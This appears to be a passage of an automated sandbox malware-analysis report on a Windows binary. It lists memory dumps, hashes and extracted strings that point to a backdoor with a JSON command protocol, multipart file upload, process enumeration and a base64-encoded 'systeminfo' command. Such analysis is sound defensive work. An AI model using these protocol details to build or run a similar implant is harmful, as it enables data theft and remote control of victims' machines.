    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: AllocHeap
    • String ID:
    • API String ID: 4292702814-0
    • Opcode ID: 207747ec03c5779b6438231ab1fa883743136f62b2697e2ac2019a5d10ff2dad
    • Instruction ID: e228f26f83c5360b420652fea4259de621d38f4f1a0db0099071e588d255cb22
    • Opcode Fuzzy Hash: 207747ec03c5779b6438231ab1fa883743136f62b2697e2ac2019a5d10ff2dad
    • Instruction Fuzzy Hash: 86F01D58B0970B81FE5DB76E5592BB5D2945F88B80FCC4531C90E862F6EE6CE8828230
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn$Object$CreateDesktopGdipWindow$BitmapCompatibleDeleteGdiplusSelect$AllocClientEncodersFromImageRectReleaseShutdownSizeStartup
    • String ID: $", "d":"$", "uId":"$", "id":"$105$image/${"n":"${"status":"013"}${"status":"014"}${"status":"103"}
    • API String ID: 149809242-3914048934
    • Opcode ID: ef322a054e7980fd1c65c34188ce0f6eeddda7de61b96defefaa8c2d82c62b78
    • Instruction ID: e3c94fefdd4397965c6329ab95877bf403c0143ec0bd2ba40459608e585f7efa
    • Opcode Fuzzy Hash: ef322a054e7980fd1c65c34188ce0f6eeddda7de61b96defefaa8c2d82c62b78
    • Instruction Fuzzy Hash: D5A2B072A14BC685EB24EF38D8503FC6361FB49798F945232DA5D07AA9EF78E185C310
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID: ", "d":"$", "id":"$", "uId":"$101$invalid stoi argument$stoi argument out of range${"n":"${"status":"010"}${"status":"102"}${"status":"110"}
    • API String ID: 0-3917518979
    • Opcode ID: ee7c6142e077d018a0edae1bb93f682eed05a56daa3bb6535a0af21e663f0f0f
    • Instruction ID: 424381f3dc7839d38e54fe7eb7e31da6e794c8747cb3690dff393164fec60054
    • Opcode Fuzzy Hash: ee7c6142e077d018a0edae1bb93f682eed05a56daa3bb6535a0af21e663f0f0f
    • Instruction Fuzzy Hash: 6F03E3A2E14B8645EB14EB78D4503FDA361EB457A8F945331EA6C07BEADF78E481C310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_$GetcollGetctypeGetvals
    • String ID: file=
    • API String ID: 553569086-2538679502
    • Opcode ID: 67a1c0790ef1249461a340128b7fb1e3b27baf6d4379e39df7b50e971e6fd2f5
    • Instruction ID: 7fea75be9ae1ab170f4a3e0f95646c00fe9f04db364af7d56b8b967f6fe741c7
    • Opcode Fuzzy Hash: 67a1c0790ef1249461a340128b7fb1e3b27baf6d4379e39df7b50e971e6fd2f5
    • Instruction Fuzzy Hash: C0822722A0AB4685EB4DFF29D8912B8A3E0AF44784F8C4535DA4D577B6DF3CF44583A0
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_$GetcollGetctype
    • String ID: file=
    • API String ID: 19648113-2538679502
    • Opcode ID: 396c6eee7f4c872df5603970c7d1090a95535081cb8cbfcc141ec48a3ca9cc28
    • Instruction ID: bc0c9da4a08e57eb4009467aba9f433731312c803fe113749eb5051643fcdc78
    • Opcode Fuzzy Hash: 396c6eee7f4c872df5603970c7d1090a95535081cb8cbfcc141ec48a3ca9cc28
    • Instruction Fuzzy Hash: 00824622E0BB4685EB49FF29D8912B8A3A0AF44784F8C4435DA0D577B6DE3CF54587A0
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide$Concurrency::cancel_current_task
    • String ID: ", "fid":"1"}$", "flDr":"$&$--------------------------346435246262465368257857$Content-Disposition: form-data; name="f"; filename="$Content-Disposition: form-data; name="fInf"$Content-Disposition: form-data; name="id"$Content-Disposition: form-data; name="m"$Content-Disposition: form-data; name="n"$Content-Type: application/octet-stream$Content-Type: multipart/form-data; boundary = $POST${"status":"008"}${"status":"024"}${"status":"111", "fName":"
    • API String ID: 3480596355-259015812
    • Opcode ID: 0838fe6f16684eb46940be8f1169d7bcf9463f7978d7b620442b91148171e785
    • Instruction ID: ed9aa6f9da7609c262bdcf172f6194ff5be871cebdbc88e5fa551ddb5dc69fe8
    • Opcode Fuzzy Hash: 0838fe6f16684eb46940be8f1169d7bcf9463f7978d7b620442b91148171e785
    • Instruction Fuzzy Hash: 31F2F462F18B8185EB04EB78D4503BDA361FB957A8F845231EA5D17AEADF78E4C1C310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn$Tablehtonsinet_ntoa
    • String ID: ", "d":"$", "uId":"$", "id":"$", "uId":"$102$104$106$UXpwY1ZYTmxjbk5j$VUUU${"n":"${"status":"011"}${"status":"012"}${"status":"015"}${"status":"016"}${"status":"103"}
    • API String ID: 2861794738-2026247035
    • Opcode ID: 18c6ea4742a7190a7bc6c5767b69587352ecc130419f13d85746abf318837e22
    • Instruction ID: 75d28dd045fc218dc662799df502f0b6c912c90aca1c5365656f102f45fac684
    • Opcode Fuzzy Hash: 18c6ea4742a7190a7bc6c5767b69587352ecc130419f13d85746abf318837e22
    • Instruction Fuzzy Hash: F9C2F562E18B8285EB14EF38D4503FDA361EB957A4F944231EA5D07AEADF78E1C5C310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getcoll
    • String ID: file=
    • API String ID: 2318601406-2538679502
    • Opcode ID: c4e082c22604d0d01a263d60d7e2b20a58e754c6ccc846a024c985314d72cb5a
    • Instruction ID: 0e82fc75f0de32df491d27e8e29c352b5cc41266280c8227d54562dbd88d607f
    • Opcode Fuzzy Hash: c4e082c22604d0d01a263d60d7e2b20a58e754c6ccc846a024c985314d72cb5a
    • Instruction Fuzzy Hash: 0A322A22E0AB0245FB5DFF2998512B9E7A0AF44780F8C4035EA4E57BB6DF7CE5418364
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiProcess32Wide$CloseCreateFirstHandleNextSnapshotToolhelp32
    • String ID: ", "d":"$", "id":"$", "uId":"$107${"n":"${"status":"016"}${"status":"103"}
    • API String ID: 2079577941-3782765540
    • Opcode ID: 729b7cb32be10c0a944716848bbef28e45815e262deb30b19e7ef0a5808eb1ca
    • Instruction ID: 63e4ac213545e3ccdb4dd75a1f4cfb6f2ff00406bcfff5f66a0da215529515ed
    • Opcode Fuzzy Hash: 729b7cb32be10c0a944716848bbef28e45815e262deb30b19e7ef0a5808eb1ca
    • Instruction Fuzzy Hash: 3B92A562A14BC585EB14EF38D8543FDA361FB95798F944335EA6C06AEAEF78D180C310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: memcpy_s$_invalid_parameter_noinfo
    • String ID: $
    • API String ID: 2880407647-227171996
    • Opcode ID: a3aae9aa187e148188ee3e8d0f716f249af1cb6b6161ada15a895cbeb3ca6e36
    • Instruction ID: b0b2efeee77e4d66f01d52e1d8312128ac99b7dc1663310f03225ff713f3f6f0
    • Opcode Fuzzy Hash: a3aae9aa187e148188ee3e8d0f716f249af1cb6b6161ada15a895cbeb3ca6e36
    • Instruction Fuzzy Hash: 9E030A72A142C28BE779DF28D980BF9B791F74438CF985135DA0A57BA4DB39E900CB50
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: " , "t":"$", "fid":"0"}$", "uId":"$Content-Type: application/json$GET$POST$file=$filename=$type=${"status":"${"status":"001"}${"status":"007"}${"status":"025"}
    • API String ID: 3668304517-724035736
    • Opcode ID: 57557a2e8098d2de54157b2f1d2863870cfbd18935dff6268356b8b7b29fb187
    • Instruction ID: 4b5eed390c0f05e024709e475f86efea246f57a6679530444e68d55efded0a9e
    • Opcode Fuzzy Hash: 57557a2e8098d2de54157b2f1d2863870cfbd18935dff6268356b8b7b29fb187
    • Instruction Fuzzy Hash: 7432A3A2E14B8581EB00EB3CD4513BDA761EB957E4F945332EA6C126E9DF78E1C1C350
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$CreateErrorFileLast
    • String ID: type=1${"status":"020"}${"status":"022"}${"status":"102"}${"status":"103"}${"status":"108"}${"status":"110"}
    • API String ID: 847724067-3449146413
    • Opcode ID: a7df7adc844e351bbb82ad79d3e5ae8fdcc3bb12ac9e4706d04bc134d0cde42e
    • Instruction ID: 1ddfd630d3fc48ae2710fe932dc3205e7bfa02d48f5cc1e4e9ce1bb358e5a363
    • Opcode Fuzzy Hash: a7df7adc844e351bbb82ad79d3e5ae8fdcc3bb12ac9e4706d04bc134d0cde42e
    • Instruction Fuzzy Hash: 3F92B262F1874641FA08EB78E4502BDA361EF847A4F945232EE5D17AF9EF7CE4808750
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: CreatePipe
    • String ID: c3lzdGVtaW5mbw==${"status":"015"}${"status":"103"}
    • API String ID: 2719314638-858149953
    • Opcode ID: dd198555e43536e2605fe2fe2d6dc716c177e868d5def0bf082a3491f6eed0c8
    • Instruction ID: 7704cc8a5ee43faa4177638cf7fdfb75c0db2c9c3abb29d9d64f044735314f2b
    • Opcode Fuzzy Hash: dd198555e43536e2605fe2fe2d6dc716c177e868d5def0bf082a3491f6eed0c8
    • Instruction Fuzzy Hash: 5E91E872914BC699E735FF38D8913FD6360FB45398F845231EA1D06AAAEF389285C310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn$Heap$Process$AllocCreateDestroyEnvironmentFreeParameters
    • String ID: @$\??\${"status":"021"}${"status":"109"}
    • API String ID: 1847043289-3946298159
    • Opcode ID: e90fc13a62e3c3175694a3568c6b7c2ee5b709cc2317347e5b19cb96a7f64993
    • Instruction ID: 419ebe70b836b12ca17daee19cc21cc220622d3564a96993d7118acd3edbd6d8
    • Opcode Fuzzy Hash: e90fc13a62e3c3175694a3568c6b7c2ee5b709cc2317347e5b19cb96a7f64993
    • Instruction Fuzzy Hash: 8252B662A14B4685EB08AB2DD8553BDA361EF407E8F845235E95D077FAEF7CE480C350
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn$Handle$CloseFile$InformationSize_fread_nolock
    • String ID: \??\${"status":"017"}${"status":"018"}${"status":"019"}${"status":"103"}
    • API String ID: 213815749-2044218413
    • Opcode ID: 672daa8552046a6e86ce328d3742f2b7fa9a8c1cdfe3349f47539b8972c47fb8
    • Instruction ID: f412c86dff98ed0d8caf64ff62c8104be812c1e7456b31b8744b458dadc5f408
    • Opcode Fuzzy Hash: 672daa8552046a6e86ce328d3742f2b7fa9a8c1cdfe3349f47539b8972c47fb8
    • Instruction Fuzzy Hash: A082C362A04B8685EB18EB2DD8543FDA351EB447A4F844232EE5D077FAEF78E584C350
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: Content-Type: application/json$GET$file=$filename=
    • API String ID: 3668304517-3007091521
    • Opcode ID: 564e62709b548e43167a9803115ffd5d0a743548e56cd6dd15194f39d17b631c
    • Instruction ID: bd18937f1aea93a9da32d11d67c55bd3a5f65d6b8911a1add99f3a8ce2b0fae9
    • Opcode Fuzzy Hash: 564e62709b548e43167a9803115ffd5d0a743548e56cd6dd15194f39d17b631c
    • Instruction Fuzzy Hash: C1C1E672E14B8185EB14EF79E4502FDA3A0FB447A8F845631EE5C46AE9EF78E180C310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: ", "n":"$, "id":"${"d":
    • API String ID: 3668304517-217307741
    • Opcode ID: f19ae3fc870347bc2389a68f26f546bcf0523541b74f8ed576f16b6d4eae24fc
    • Instruction ID: 0b7c25afb465be2099dc090775e373b26ce0d3c2d43c46b3fdf61e46e0129e86
    • Opcode Fuzzy Hash: f19ae3fc870347bc2389a68f26f546bcf0523541b74f8ed576f16b6d4eae24fc
    • Instruction Fuzzy Hash: EEF1C362E18B8585EB04AB3CD4513BCA361FB957A4F549331EAAC12AE6DF7CE4C1C350
    APIs
      • Part of subcall function 00007FF75BD2E8C8: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF75BD2E8DD
      • Part of subcall function 00007FF75BD2E8C8: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF75BD2E902
      • Part of subcall function 00007FF75BD2E8C8: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF75BD2E92C
      • Part of subcall function 00007FF75BD2E8C8: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF75BD2E9C4
    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75BD3978D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
